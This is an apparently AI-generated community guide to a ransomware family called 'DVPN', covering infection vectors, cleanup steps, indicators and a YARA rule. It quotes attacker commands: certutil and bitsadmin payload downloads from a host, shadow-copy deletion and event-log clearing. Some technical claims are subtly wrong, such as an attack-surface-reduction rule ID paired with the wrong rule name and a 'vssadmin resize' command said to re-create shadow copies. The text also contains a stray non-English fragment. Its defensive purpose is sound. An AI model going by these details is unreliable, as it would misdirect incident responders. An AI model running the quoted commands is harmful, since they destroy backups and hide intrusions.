dvpn

[Content by Gemini 2.5]

Community Resource – Ransomware “DVPN” (.dvpn)

Technical Breakdown

1. File Extension & Renaming Patterns

  • Confirmed extension: .dvpn (lower-case, four letters, appended as a SECONDARY extension).
    Example: Quarterly-report.xlsx → Quarterly-report.xlsx.dvpn
  • Additional artefacts left in every folder:
    README_TO_RESTORE.txt (sometimes HOW_TO_DECRYPT.hta dropped in %PUBLIC%).
    Typical note header:
    “>>>> Your network is ENCRYPTED with DVPN Locker <<<<”

2. Detection & Outbreak Timeline

  • Early public sightings: 13-Apr-2023 (ID-Ransomware uploads, Twitter)
  • Major campaign wave: 18-May-2023 → 01-Jun-2023 (health-care & local gov)
  • Still circulating “as-a-service” on Russian-language forums (June-2024)
  • AV sig names you will see in logs:
    Ransom:Win32/DVPNLocker.A, Trojan-Ransom.DVPN, RansomX-gen [Trj], DeepInstinct-Ransom.dvpn.1

3. Primary Attack Vectors

  1. Exploitation of un-patched public-facing services
  • Fortinet CVE-2022-40684 (auth-by-pass) → most common entry in 2023.
  • Citrix CVE-2023-3519 (code-injection) appears in June-2024 incidents.
  1. RDP/SSH brute-force + credential-stuffing lists – once inside, PSExec & WMI to push dvpn.exe (usually named msupdate.exe or forservice.exe).
  2. Phishing with ISO / ZIP → LNK → PowerShell stager. ISO attachment boom in Apr-2024.
  3. Living-off-the-land:
  • Uses bitsadmin or certutil to pull second-stage payload from hxxp://IP:8080/d1.bin
  • Employs WinRAR to archive %USERPROFILE% before encryption (exfil for double-extortion).
  • Deletes VSC with vssadmin delete shadows /all /quiet and clears event logs with wevtutil.
  1. Lateral movement: EternalBlue (MS17-010) still handy if SMBv1 enabled; spreads dvpn.exe to ADMIN$ shares.

Remediation & Recovery Strategies

1. Prevention (100 % cheaper than recovery)

  • Patch outside-in: FortiOS, Citrix-NetScaler, Exchange, & any SSL-VPN firmware inside 24 h.
  • Disable SMBv1 at scale (Disable-WindowsOptionalFeature –Online -FeatureName SMB1Protocol).
  • MFA everywhere: VPN, RDP, OWA, Citrix, SQL, etc.
  • Segment & filter: put critical servers on separate VLAN, allow only RDP jump-host.
  • Lateral-movement defence: enforce “LocalAdmin” tiering + Protected Users + LAPS.
  • Application whitelisting (WDAC/App-Ctrl) block *.exe runs from %TEMP%, %PUBLIC%, C:\PerfLogs.
  • Disable Office-macros for Internet-zone attachments.
  • Immutable & off-line backups (3-2-1 rule) – Veeam “Linux hardened repo” or S3 Object-Lock.
  • Deploy free AV extensions: Microsoft “Block-Ransomware” ASR rules (rule ID 92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b, “Block credential stealing…”) and Windows Defender “Network protection”.

2. Removal / Incident-Cleanup Checklist

  1. Disconnect the box from network(s) instantly (pull cable / disable VM-NIC).
  2. Collect triage image (memory dump, MFT, journals) BEFORE disinfection if you intend to hunt or report.
  3. Identify persistence:
  • Scheduled task \Microsoft\Windows\DiskFootPrint\StorageOptimizer (runs C:\ProgramData\drvstore\dvpnsvc.exe).
  • Service DVPNetworkProvider (description “Provides network optimisation”).
  1. Boot into Safe-Mode-with-Networking or mount the disk from a clean Win-PE.
  2. Delete artefacts:
    %ProgramData%\drvstore\dvpnsvc.exe
    %ProgramData%\readme_to_restore.txt
    HKLM\Software\DVPNLocker (entire key)
  3. Undo damage:
  • vssadmin resize shadowstorage /for=C: /on=C: /maxsize=10% (re-creates VSC).
  • Re-enable Windows-Recovery-Environment (reagentc /enable).
  1. Patch & harden (see §1).
  2. Re-scan with fully updated AV / EDR to confirm hash-based IOC no longer present.
  3. Only now re-attach to network—but keep on quarantine VLAN until SOC green-lights.

3. File Decryption & Recovery

  • Decryptable? NO – DVPN uses Curve25519 + ChaCha20-Poly1305. Private key stays with the criminals.
  • No official Kaspersky/RCE/Bitdefender tool exists.
  • Semi-success alternatives:
    a) Shadow-Volume-CoPy scraping: shadowcopyview.exe, esentutl, or PhotoRec for Shift-deleted originals.
    b) File-recovery tools: Recuva, R-Studio, TestDisk (only helps if disk was lightly used post-attack).
    c) Free “Previous Versions”: right-click encrypted file → Properties → Previous Versions (works if VSS deleted late or failed).
    d) Cloud/SaaS: check M365 “OneDrive Files Restore” or Google Drive “Manage versions”. They keep 30-100 days.
  • Payment risk: DVPN TOR panel lists $980–$5800 (depends on victim size). Even if paid, <70 % receive working decryptor (2024 “State-of-Ransomware” report).
  • Recommended: restore from off-line backup; if none exists, treat as permanent data loss and rebuild.

4. Other Critical Information / IOCs

  • YARA hunting rule (public, by @demonslay335): 
  rule MAL_RANSOM_Win32_DVPNLocker {
      meta:
        author = "Michael Gillespie"
        description = "DVPN encryptor/dropper"
      strings:
        $s0 = "-----BEGIN DVPN CURVE25519 PUBLIC KEY-----" wide
        $s1 = ".dvpn" wide
        $s2 = "README_TO_RESTORE.txt" wide
        $s3 = { C7 45 ?? 64 76 70 6E 00 } // pushes string "dvpn"
      condition:
        uint16(0)==0x5A4D and 3 of them
  }
  • Network IOCs (grab from proxy/firewall):
    hxxp://194.147.78[.]11:8080/d1.bin
    hxxps://tqlkgceawsd6k3p7agr3wxlu32qz3vf7illarj6q2p7sirmcovedz6ad.onion[.]top/panel/login
  • MITRE ATT&CK map:
    T1190 (Exploit Public-Facing App), T1078 (Valid Accounts), T1021.001 (RDP), T1486 (Data Encrypted for Impact), T1490 (Inhibit System Recovery), T1041 (Exfil Over C2).
  • Noteworthy quirks:
    – Avoids CIS countries by checking GetSystemDefaultUILanguage.
    – Drops canary file C:\donotdelete.txt; if this file exists → self-deletes (used by operators to “vaccinate” their own machines).
    – Encrypts NAS shares alphabetically; network-mapped Linux/Samba drives usually hit first (alphabet “A”).

Bottom line: .dvpn is NOT decryptable—your only reliable route is clean backups plus fast patching of Fortinet/Citrix vectors. Use the IOC list above to hunt残留 threats and keep the YARA rule in your EDR for retroactive searching. Stay safe and patch early!